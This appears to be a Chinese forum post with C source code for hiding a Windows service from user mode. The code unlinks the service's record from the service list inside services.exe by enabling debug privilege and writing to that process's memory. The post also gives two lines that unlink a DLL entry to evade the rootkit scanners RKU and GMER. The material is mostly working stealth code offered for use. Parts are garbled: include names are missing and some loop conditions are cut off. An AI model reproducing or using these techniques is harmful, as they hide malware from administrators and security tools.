ring3下隐藏服务的代码

来自： ASM 过RKU,GMAER的dll模块检查的 代码 ，就两句： ldm-HashLinks.Blink-Flink = ldm-HashLinks.Flink; ldm-HashLinks.Flink-Blink = ldm-HashLinks.Blink; //下面是一个ring3下 隐藏 服务 的 代码 ，也是抄别人小小修改了一下而已的： #include #incl

来自：ASM

过RKU,GMAER的dll模块检查的代码，就两句：

ldm->HashLinks.Blink->Flink = ldm->HashLinks.Flink;
ldm->HashLinks.Flink->Blink = ldm->HashLinks.Blink;

//下面是一个ring3下隐藏服务的代码，也是抄别人小小修改了一下而已的：

#include
#include
#include
#include

// 几个Undocument的结构
typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;
typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;
typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

typedef struct _SC_SERVICE_PROCESS
{
PSC_SERVICE_PROCESS Previous;
PSC_SERVICE_PROCESS Next;
WCHAR *ImagePath;
DWORD Pid;
DWORD NumberOfServices;
// ...
} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

typedef struct _SC_DEPEND_SERVICE
{
PSC_DEPEND_SERVICE Next;
DWORD Unknow;
PSC_SERVICE_RECORD Service;
// ...
} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

typedef struct _SC_SERVICE_RECORD
{
PSC_SERVICE_RECORD Previous;
PSC_SERVICE_RECORD Next;
WCHAR *ServiceName;
WCHAR *DisplayName;
DWORD Index;
DWORD Unknow0;
DWORD sErv;
DWORD ControlCount;
DWORD Unknow1;
PSC_SERVICE_PROCESS Process;
SERVICE_STATUS Status;
DWORD StartType;
DWORD ErrorControl;
DWORD TagId;
PSC_DEPEND_SERVICE DependOn;
PSC_DEPEND_SERVICE Depended;
// ...
} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

int WINAPI UnicodeToAnsiStr(OUT char *lpChar, IN WCHAR *lpWideChar)
{
int iLen;

iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, NULL, 0, NULL, NULL);
if ((iLen > 1) || (iLen {
ZeroMemory(lpChar, 40);
iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, lpChar, iLen, NULL, NULL);
}

return iLen;
}

BOOL SetDebugPrivilege()
{
BOOL bRet = FALSE;
HANDLE hToken = NULL;
LUID luid;
TOKEN_PRIVILEGES tp;

if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) &&
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
{
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
}

if (hToken) CloseHandle(hToken);
return bRet;
}

DWORD GetProcessIdByName(char *Name)
{
BOOL bRet = FALSE;
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = { 0 };
DWORD Pid = -1;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcessSnap) return -1;

pe32.dwSize = sizeof(PROCESSENTRY32);

if (Process32First(hProcessSnap, &pe32))
{
do
{
if (!lstrcmpi(pe32.szExeFile, Name ) )
{
Pid = pe32.th32ProcessID;
break;
}
}
while (Process32Next(hProcessSnap, &pe32));
}

CloseHandle(hProcessSnap);
return Pid;
}

// 修改内存属性为指定值
void ProtectWriteDword(HANDLE hProcess, DWORD *Addr, DWORD Value)
{
MEMORY_BASIC_INFORMATION mbi;
DWORD dwOldProtect, dwWritten;

VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);
WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
}

//寻找服务链表
PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)
{
char FileName[MAX_PATH+1];
HANDLE hFile, hFileMap;
UCHAR * pMap;
DWORD dwSize, dwSizeHigh, i, dwRead;
SC_SERVICE_RECORD SvcRd, *pSvcRd, *pRet = NULL;

GetSystemDirectory( FileName, MAX_PATH );
strcat( FileName,"Services.exe");

hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, 0, NULL);
if (INVALID_HANDLE_VALUE == hFile) return NULL;

dwSizeHigh = 0;
dwSize = GetFileSize(hFile, &dwSizeHigh);

hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
if (NULL == hFileMap) return NULL;

pMap = (UCHAR*)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);
if (NULL == pMap) return NULL;

dwSize -= 12;
for (i=0; i
{
// 搜索services!ScGetServiceDatabase特征代码
if (*(DWORD*)(pMap+i) == 0xa1909090 &&
*(DWORD*)(pMap+i+8) == 0x909090c3)
{
if (ReadProcessMemory(hProcess, *(PVOID*)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) &&
ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
SvcRd.sErv == vrEs) // ServiceRecord结构的特征
{
pRet = pSvcRd;
break;
}
}
}

UnmapViewOfFile(pMap);
CloseHandle(hFileMap);
CloseHandle(hFile);

//printf( "addr: 0x%08xn", (DWORD *)pRet );
return pRet;
}

// 隐藏服务
BOOL HideService(char *Name)
{
DWORD Pid;
HANDLE hProcess;
SC_SERVICE_RECORD SvcRd, *pSvcRd;
DWORD dwRead, dwNameSize;
WCHAR SvcName[MAX_PATH] = { 0 };
char lpSvcName[256] = {0};

dwNameSize = strlen(Name)*2; //UNICODE的话，长度要乘以2

if (dwNameSize > sizeof(SvcName))
{
return FALSE;
}

Pid = GetProcessIdByName("Services.exe");
if (Pid == -1)
{
printf("get pid errorrn");
return FALSE;
}

if(!SetDebugPrivilege())
{
printf("SetDebugPrivilege errorrn");
return FALSE;
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
if (NULL == hProcess)
{
printf("OpenProcess error:%drn",GetLastError());
return FALSE;
}
pSvcRd = FindFirstServiceRecord(hProcess);
if (NULL == pSvcRd)
{
printf("FindFirstServiceRecord errorrn");
CloseHandle(hProcess);
return FALSE;
}

do
{
if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead))
{
//OutputDebugStringW(SvcName);
// 匹配服务名
memset(lpSvcName,0,sizeof(lpSvcName));
UnicodeToAnsiStr(lpSvcName,SvcName);
if (lstrcmpi(lpSvcName, Name) == NULL)
{
// 从链表中断开（一般来说ServiceRecord是可写的，但还是先改保护属性以防万一）
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next);
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);
CloseHandle(hProcess);
return TRUE;
}
}
else
{
break;
}
}
while (pSvcRd = SvcRd.Next);

if( NULL != hProcess )
{
CloseHandle(hProcess);
}

return FALSE;
}
int main()
{
HideService("Alerter");
return 0;
}